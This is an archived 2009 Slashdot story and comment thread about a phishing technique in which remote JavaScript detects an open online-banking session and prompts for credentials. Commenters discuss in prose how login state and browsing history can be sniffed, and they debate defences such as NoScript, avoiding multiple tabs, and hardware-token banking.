Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!


Forgot your password?

Slashdot videos: Now with more Slashdot!

  • View

  • Discuss

  • Share

We've improved Slashdot's video section; now you can view our video interviews, product close-ups and site visits with all the usual Slashdot options to comment, share, etc. No more walled garden! It's a work in progress -- we hope you'll check it out (Learn more about the recent updates).

Security IT

Phishing For Bank Info Without Any Pesky Malware 232

Posted by timothy
from the but-the-convenience-is-incredible dept.
Emb3rz writes "DarkReading.com brings us news of a new approach to phishing that targets online banking sites. Here's the novel part of it: it doesn't involve any of the typical attack vectors we all know and love. Instead, it uses JavaScript from a remote page to detect if you have a banking site open, and prompts you for info via popup if you do."
This discussion has been archived. No new comments can be posted.

Phishing For Bank Info Without Any Pesky Malware

Comments Filter:
  • XSS (Score:5, Informative)

    by AKAImBatman (238306) * <{moc.liamg} {ta} {namtabmiaka}> on Friday January 16, 2009 @12:08AM (#26478671) Homepage Journal

    Here's the novel part of it: it doesn't involve any of the typical attack vectors we all know and love.

    A cross-site scripting attack sounds like a pretty typical attack vector to me. Javascript should not be able to "detect" if they have a banking site open. Pure and simple.

  • by Anonymous Coward on Friday January 16, 2009 @12:10AM (#26478679)

    I've heard of something like this before.
    Though there's this magical thing called noscript.
    If people would stop putting law before them to prevent them from making stupid choices then we might have a more informed society.
    (I ironically didn't read TFA.)

  • Simple Solution... (Score:5, Informative)

    by Klootzak (824076) on Friday January 16, 2009 @12:12AM (#26478691)

    Don't have multiple tabs/windows open while you're doing your online banking!!!

    Oh, and use NoScript! [noscript.net]

  • by Klootzak (824076) on Friday January 16, 2009 @12:24AM (#26478759)

    Yelling "Install NoScript you n00bs!!!" won't register noobs... because they're newbs.

    Well, I wouldn't call them n00bs firstly... and secondly, most of the technically-savvy geeks/nerds I know read Slashdot and find out new and interesting stuff from here.

    One of the best things about Slashdot is if you write something on here, ALOT of people will take notice. So if by providing solutions/information that people can read and take away to tell other non-technically-savvy individuals helps protect at least one person from being scammed, I'm more than happy to yell on Slashdot about it ;)

  • by dmomo (256005) on Friday January 16, 2009 @01:04AM (#26478967) Homepage

    I agree. Most XSS attacks would require the banking site to have a vulnerability. This article implies that all one needs is a vulnerability on the first (high-profile) site.

  • by totally bogus dude (1040246) on Friday January 16, 2009 @04:04AM (#26479671)

    It's explained in a few comments above. You just reference a resource (usually an image) that requires you to be logged in at the target site in order to access. If your attempt fails, the user isn't logged in at that site. If it succeeds, you know the user is currently logged in.

  • by thetartanavenger (1052920) on Friday January 16, 2009 @05:35AM (#26480057)
    NoScript breaks my online banking. Yeah it's a good idea and I tried to use it for a while, but I found that no matter what exceptions I gave it when it came to my bank, it refused to allow me access. Don't know why, but it kinda kills your argument if you have to turn NoScript off completely to use your online banking.
  • by DigitAl56K (805623) * on Friday January 16, 2009 @05:48AM (#26480111)

    Problem is with no-script you still have to decide if you trust or not-trust the site and if that level of trust you have is worth what the site is offering.

    That slightly over-simplifies the protection that NoScript offers. For example, even when you allow script to run NoScript still provides protection against certain types of XSS, you can use it to force cookies to be exchanged over https for certain domains, it can block some plug-in types (Java, Flash, Silverlight), it features click-jacking protection, and just a couple of days ago it even added protection against attacks on twitter [hackademix.net].

    So yes, you do have to make that trade-off, but even when you click "allow" you're potentially better off with NoScript installed than without it.

  • by sincewhen (640526) on Friday January 16, 2009 @06:42AM (#26480363)
  • No passwords (Score:2, Informative)

    by Haiyadragon (770036) on Friday January 16, 2009 @07:20AM (#26480525)
    Over here in the Netherlands most banks (maybe all) don't use passwords. In my case I have a card reader that will generate a code after I give it my card, PIN number and a code generated by the website. I have to do this to log in and to initiate transactions. That makes this attack pretty useless. Also, a prompt should always clearly indicate by which website it was called and it shouldn't block other tabs.
  • Re:XSS (Score:1, Informative)

    by Anonymous Coward on Friday January 16, 2009 @07:27AM (#26480573)

    The script doesn't access the image, it just gets the information that loading the image succeeded or resulted in an error. Third party images are a very common thing on the web. You may be able to find an option in your browser for disabling third party content (everything not coming from within the same domain/path as the HTML document holding it all together), but if you turn off third party content, many pages will stop working or miss lots of pictures (on the plus side, you won't be seeing many ads either).

    A naive approach would be to limit the events fired by the image (onerror and onload) to scripts which have the same origin as the image. That wouldn't stop the attack though, because images influence the layout: The script could test if the image has loaded by looking at pixel distances on the page. A similar attack can be used to see if you have visited a particular page within the time that your browsing history covers (usually 7-14 days). To do that, a script can look at the color of a link. If it's the color of visited links, you've been there. This attack does not load anything from the server, so it would be a useful pre-test to see if you actually use online banking and at which bank. Then the image loading detection routine only needs to be performed for that bank.

    In essence, if you do anything that you have to log in for, turn off your browsing history and browse like it's 1994: One page at a time, no tabs.

  • by blueg3 (192743) on Friday January 16, 2009 @09:51AM (#26481653)

    When you're currently visiting one site, and open a new tab and go to a different site, those two open tabs should have no capacity to share information -- they should function as if they were separate browser sessions. (Obviously this isn't the same as if you clicked on something in a tab that causes another tab or window to open, as they may need to share knowledge. But then, the fact that those two tabs/windows are tied to the same context should be made apparent to the user.)

Shortest distance between two jokes = A straight line